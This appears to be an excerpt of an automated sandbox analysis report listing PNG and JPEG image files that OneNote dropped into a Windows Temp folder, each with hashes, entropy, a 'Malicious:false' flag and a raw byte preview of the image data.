                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1D868CFC-1A8C-474E-B431-88D89FAA2FD5}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{1FC5DFF7-25EC-4D03-A86C-0F98C15BA673}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2117BC1C-70B5-43CE-BF52-A08F40F963C4}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24268
                                                                                                                                                                                                                  Entropy (8bit):6.946124661664625
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                                  MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                                  SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                                  SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                                  SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2228100C-9A83-4FE8-B4AC-183C99304E80}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{240F5535-34F9-422E-BABF-8E62B4762A16}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{25C24257-5D37-470C-97E0-9D9044BC3EEC}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2678939A-2C8A-4095-B548-2B694687A727}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24268
                                                                                                                                                                                                                  Entropy (8bit):6.946124661664625
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                                  MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                                  SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                                  SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                                  SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2738344F-AEDA-470D-9692-E3EC0330E08E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{279304AF-96D7-442A-B714-77684F37863E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1873
                                                                                                                                                                                                                  Entropy (8bit):7.534961703340853
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                                                                                                                                  MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                                                                                                                                  SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                                                                                                                                  SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                                                                                                                                  SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{27EFDE2F-A922-41B4-8AAC-CAA081B4965A}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{290C9870-E39F-411E-A584-651E2768D8D5}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{29643502-D4C5-49A0-AF36-8AAD8B06D4D2}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
